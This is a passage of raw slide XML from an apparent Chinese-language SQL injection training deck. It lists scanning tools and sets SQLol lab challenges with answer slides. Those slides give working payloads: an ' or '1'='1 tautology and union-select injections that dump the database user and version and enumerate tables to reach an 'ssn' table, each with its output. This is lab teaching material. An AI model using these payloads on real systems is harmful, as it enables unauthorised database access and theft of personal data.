              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入测试工具</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQLMAP</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>功能强大</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>界面不友好</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>AWVS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>／</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>APPScan</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>／</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>WebInspect</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>可以查找各种类型的漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>速度较慢</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="561263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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入实例 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="mr-IN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>SQLol</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>页面：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>mcir.pte.com/sqlol/challenges/challenge0.php</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>要求：输入点可以查询用户名是否存在。使用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入遍历所有用户</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>语句类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>- SELECT </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>语句注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>访问类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>- GET </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>过滤 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>None </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>输出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>所有用户，错误语句，查询语句</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1459141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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入实例 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>SQLol</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>答案</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" b="1" dirty="0" err="1"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" b="1" dirty="0"/>
              <a:t> '1'='1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>Query </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>(injection string is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" u="sng" dirty="0"/>
              <a:t>underlined</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT username FROM users WHERE username = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0"/>
              <a:t>' or '1'='1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>' GROUP BY username ORDER BY username ASC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>Results:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Array ( [username] =&gt; Chunk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>MacRunfast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> ) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Array ( [username] =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Herp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Derper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> ) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Array ( [username] =&gt; Peter Weiner ) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Array ( [username] =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>SlapdeBack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>LovedeFace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> ) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Array ( [username] =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Wengdack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Slobdegoob</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> ) </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1553521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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入实例 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>SQLol</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>页面：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>mcir.pte.com/sqlol/challenges/challenge1.php</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>要求：找到社会安全码表，显示内容</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> - SELECT </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>访问类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> - GET </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>过滤 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>- None </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>输出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>所有用户，错误语句，查询语句</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="748346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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入实例 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>SQLol</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>答案</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>查找数据库</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>and 1=2 union select </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>concat_ws</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>(char(32,58,32),user(),database(),version()) </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>Array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t> ( [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>] =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>pte@localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>sqlol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t> : 5.5.56-MariaDB ) </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> 查找表</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>' and 1=2 union all select TABLE_NAME from </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>information_schema.TABLES</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t> where TABLE_SCHEMA='</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>sqlol</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>'; #</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>Array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t> ( [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>] =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>ssn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t> ) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
